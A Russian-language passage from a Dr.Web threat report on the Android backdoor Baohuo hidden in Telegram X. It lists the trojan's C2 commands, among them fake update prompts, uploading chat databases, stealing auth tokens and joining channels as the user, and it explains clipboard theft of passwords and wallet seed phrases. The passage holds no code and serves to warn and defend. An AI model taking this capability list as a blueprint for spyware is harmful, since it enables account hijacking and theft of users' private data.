показать окно с информацией об обновлении приложения Telegram X — при нажатии на него пользователь перенаправляется на заданный сайт;
отправить на C2-сервер информацию обо всех установленных приложениях;
сбросить на зараженном устройстве текущую сессию авторизации пользователя в Telegram;
показать окно с информацией об обновлении приложения Telegram X, где пользователю предлагается установить APK-файл (если файл отсутствует, троян предварительно скачивает его);
убрать значок Telegram Premium в интерфейсе приложения у текущего пользователя;
загрузить на C2-сервер информацию из баз данных Telegram X, в которых хранится история чатов, сообщения и другие конфиденциальные данные;
подписать пользователя на заданный Telegram-канал;
покинуть заданный Telegram-канал;
вступить от лица пользователя в Telegram-чат по указанной ссылке;
получить список устройств, на которых выполнена авторизация в Telegram;
запросить получение токена аутентификации пользователя и передать его на С2-сервер.

Отметим, что перехват данных из буфера обмена, когда пользователь сворачивает мессенджер и снова возвращается в его окно, позволяет реализовывать различные сценарии кражи конфиденциальных данных. Например, жертва может скопировать пароль или мнемоническую фразу для входа в криптокошелек, текст важного документа для отправки бизнес-партнерам по почте и т. д., а троян перехватит оставшиеся в буфере данные и передаст злоумышленникам.

Dr.Web Security Space для мобильных устройств успешно обнаруживает и удаляет известные версии бэкдора Android.Backdoor.Baohuo.1.origin, поэтому для наших пользователей он опасности не представляет.

Подробнее об Android.Backdoor.Baohuo.1.origin
Индикаторы компрометации